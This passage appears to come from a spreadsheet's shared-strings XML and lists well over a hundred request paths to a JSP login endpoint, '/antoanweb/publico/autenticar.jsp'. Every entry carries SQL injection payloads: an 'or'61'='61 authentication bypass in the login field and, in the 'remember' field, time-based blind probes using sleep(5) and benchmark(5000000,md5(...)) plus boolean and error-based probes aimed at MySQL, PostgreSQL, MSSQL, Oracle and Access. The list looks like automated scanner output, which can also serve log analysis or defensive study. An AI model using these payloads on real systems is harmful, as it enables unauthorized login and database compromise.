    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and3562=benchmark(5000000,md5(char(118,107,68,78)))and("tdxu"="tdxu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and3562=benchmark(5000000,md5(char(118,107,68,78)))and(("ubhp"="ubhp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and3562=benchmark(5000000,md5(char(118,107,68,78)))and((("jfia"="jfia&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3562=benchmark(5000000,md5(char(118,107,68,78)))and"wcoj"="wcoj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and3562=benchmark(5000000,md5(char(118,107,68,78)))and("hhfr"like"hhfr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and3562=benchmark(5000000,md5(char(118,107,68,78)))and(("wtoq"like"wtoq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and3562=benchmark(5000000,md5(char(118,107,68,78)))and((("idqs"like"idqs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3562=benchmark(5000000,md5(char(118,107,68,78)))and"lolw"like"lolw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and525=benchmark(5000000,md5(char(78,102,108,106)))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and525=benchmark(5000000,md5(char(78,102,108,106)))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and525=benchmark(5000000,md5(char(78,102,108,106)))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and525=benchmark(5000000,md5(char(78,102,108,106)))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and525=benchmark(5000000,md5(char(78,102,108,106)))--and(4022=4022&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and525=benchmark(5000000,md5(char(78,102,108,106)))--and((1024=1024&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and525=benchmark(5000000,md5(char(78,102,108,106)))--and(((2762=2762&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and525=benchmark(5000000,md5(char(78,102,108,106)))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and525=benchmark(5000000,md5(char(78,102,108,106)))--and('zcss'='zcss&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and525=benchmark(5000000,md5(char(78,102,108,106)))--and(('aprr'='aprr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and525=benchmark(5000000,md5(char(78,102,108,106)))--and((('nzeh'='nzeh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and525=benchmark(5000000,md5(char(78,102,108,106)))--and'cgvu'='cgvu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and525=benchmark(5000000,md5(char(78,102,108,106)))--and('yasb'like'yasb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and525=benchmark(5000000,md5(char(78,102,108,106)))--and(('vebl'like'vebl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and525=benchmark(5000000,md5(char(78,102,108,106)))--and((('nkjh'like'nkjh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and525=benchmark(5000000,md5(char(78,102,108,106)))--and'nhuu'like'nhuu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and525=benchmark(5000000,md5(char(78,102,108,106)))--and("phzx"="phzx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and525=benchmark(5000000,md5(char(78,102,108,106)))--and(("dndp"="dndp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and525=benchmark(5000000,md5(char(78,102,108,106)))--and((("okkl"="okkl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and525=benchmark(5000000,md5(char(78,102,108,106)))--and"qhmw"="qhmw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and525=benchmark(5000000,md5(char(78,102,108,106)))--and("anej"like"anej&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and525=benchmark(5000000,md5(char(78,102,108,106)))--and(("ngso"like"ngso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and525=benchmark(5000000,md5(char(78,102,108,106)))--and((("lozf"like"lozf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and525=benchmark(5000000,md5(char(78,102,108,106)))--and"wwct"like"wwct&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8892&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1747)or7059=sleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9434&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3064')or7059=sleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9800&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2886'or7059=sleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2310&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3280"or7059=sleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7042&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7098)or7059=sleep(5)and(3315=3315&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2519&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5749))or7059=sleep(5)and((4814=4814&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3010&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4211)))or7059=sleep(5)and(((724=724&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5800&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1542or7059=sleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9792&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6659')or7059=sleep(5)and('nqsc'='nqsc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2429&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4809'))or7059=sleep(5)and(('vidv'='vidv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8776&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3049')))or7059=sleep(5)and((('otnk'='otnk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5993&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2657'or7059=sleep(5)and'jgio'='jgio&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-206&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1023')or7059=sleep(5)and('bjeo'like'bjeo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7092&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4755'))or7059=sleep(5)and(('cljh'like'cljh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3678&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4768')))or7059=sleep(5)and((('jcqf'like'jcqf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-624&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1081'or7059=sleep(5)and'eqqx'like'eqqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4172&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4224")or7059=sleep(5)and("sghv"="sghv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6127&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4503"))or7059=sleep(5)and(("svrz"="svrz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1730&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4266")))or7059=sleep(5)and((("lgpd"="lgpd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7868&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6909"or7059=sleep(5)and"wbkn"="wbkn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8986&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8994")or7059=sleep(5)and("wqdw"like"wqdw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7402&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6086"))or7059=sleep(5)and(("czvf"like"czvf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2033&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5885")))or7059=sleep(5)and((("jchd"like"jchd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-75&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5625"or7059=sleep(5)and"ddhg"like"ddhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7382&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5232)or4510=benchmark(5000000,md5(char(86,65,109,97)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3860&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3385')or4510=benchmark(5000000,md5(char(86,65,109,97)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9531&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1676'or4510=benchmark(5000000,md5(char(86,65,109,97)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1335&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4762"or4510=benchmark(5000000,md5(char(86,65,109,97)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3310&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7403)or4510=benchmark(5000000,md5(char(86,65,109,97)))and(1954=1954&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-608&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2841))or4510=benchmark(5000000,md5(char(86,65,109,97)))and((7763=7763&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3778&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8567)))or4510=benchmark(5000000,md5(char(86,65,109,97)))and(((5255=5255&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4966&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9357or4510=benchmark(5000000,md5(char(86,65,109,97)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2140&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7673')or4510=benchmark(5000000,md5(char(86,65,109,97)))and('wkxm'='wkxm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5696&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4172'))or4510=benchmark(5000000,md5(char(86,65,109,97)))and(('jqxo'='jqxo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6587&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6191')))or4510=benchmark(5000000,md5(char(86,65,109,97)))and((('izkz'='izkz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3721&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3727'or4510=benchmark(5000000,md5(char(86,65,109,97)))and'rlyp'='rlyp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1663&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1886')or4510=benchmark(5000000,md5(char(86,65,109,97)))and('ofxa'like'ofxa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9424&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2782'))or4510=benchmark(5000000,md5(char(86,65,109,97)))and(('beei'like'beei&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1961&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1730')))or4510=benchmark(5000000,md5(char(86,65,109,97)))and((('emqw'like'emqw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4777&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4555'or4510=benchmark(5000000,md5(char(86,65,109,97)))and'btnr'like'btnr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9462&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7585")or4510=benchmark(5000000,md5(char(86,65,109,97)))and("eodh"="eodh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8805&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8918"))or4510=benchmark(5000000,md5(char(86,65,109,97)))and(("mowk"="mowk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4079&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2999")))or4510=benchmark(5000000,md5(char(86,65,109,97)))and((("mbfw"="mbfw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3279&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3155"or4510=benchmark(5000000,md5(char(86,65,109,97)))and"okpr"="okpr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9169&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6662")or4510=benchmark(5000000,md5(char(86,65,109,97)))and("obgg"like"obgg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-368&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3556"))or4510=benchmark(5000000,md5(char(86,65,109,97)))and(("hcxr"like"hcxr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6831&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4523")))or4510=benchmark(5000000,md5(char(86,65,109,97)))and((("biml"like"biml&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2673&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9468"or4510=benchmark(5000000,md5(char(86,65,109,97)))and"naxo"like"naxo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(selectgenerate_series(,,casewhen(9207=7989)then1else0end)limit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(selectgenerate_series(,,casewhen(812=812)then1else0end)limit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(selectgenerate_series(,,casewhen(2171=908)then1else0end)limit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(7697=7757)thenelse7697*(select7697frommaster..sysdatabases)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(2193=2193)thenelse2193*(select2193frommaster..sysdatabases)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(564=4045)thenelse564*(select564frommaster..sysdatabases)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(2550=8532)thenelse1/(select0fromdual)end)fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(760=760)thenelse1/(select0fromdual)end)fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(4444=1838)thenelse1/(select0fromdual)end)fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=iif(2471=2091,,1/0)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=iif(9844=9844,,1/0)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=iif(1337=753,,1/0)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(casewhen7916=2434thenelsenullend)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(casewhen3826=3826thenelsenullend)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(casewhen6913=7808thenelsenullend)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(9818=5570)thenelse9818*(select9818frommaster..sysdatabases)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(1863=1863)thenelse1863*(select1863frommaster..sysdatabases)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(3938=6715)thenelse3938*(select3938frommaster..sysdatabases)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(2355=5285)thenelse1/(select0fromdual)end)fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(7739=7739)thenelse1/(select0fromdual)end)fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(7831=3235)thenelse1/(select0fromdual)end)fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,iif(9875=5440,,1/0)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,iif(3387=3387,,1/0)&amp;modo=entrar</t>
  </si>
  <si>
